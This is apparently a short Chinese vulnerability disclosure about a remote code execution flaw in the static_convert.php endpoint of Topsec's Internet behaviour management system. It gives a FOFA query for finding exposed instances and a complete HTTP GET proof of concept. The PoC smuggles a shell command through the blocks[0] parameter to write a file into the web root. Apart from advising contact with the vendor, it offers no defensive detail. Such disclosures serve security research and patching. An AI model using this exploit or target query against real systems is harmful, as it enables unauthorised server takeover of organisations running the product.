Nx01 產品簡介

????????天融信上網行為管理系統是天融信公司憑借多年來的安全產品研發經驗，為滿足各行各業進行網絡行為管理和內容審計的專業產品。

Nx02 漏洞描述

????????天融信上網行為管理系統老版本static_convert.php接口存在RCE漏洞，攻擊者利用此漏洞可以獲取服務器權限。

Nx03 產品主頁

fofa-query: app="天融信-上網行為管理系統"

Nx04 漏洞復現

POC：

GET /view/IPV6/naborTable/static_convert.php?blocks[0]=||%20%20echo%20'pjuxfavsfdulmkj'%20>>%20/var/www/html/uhvokh.txt%0A HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36
Connection: close
Accept-Encoding: gzip

Nx05 修復建議

建議聯系軟件廠商進行處理。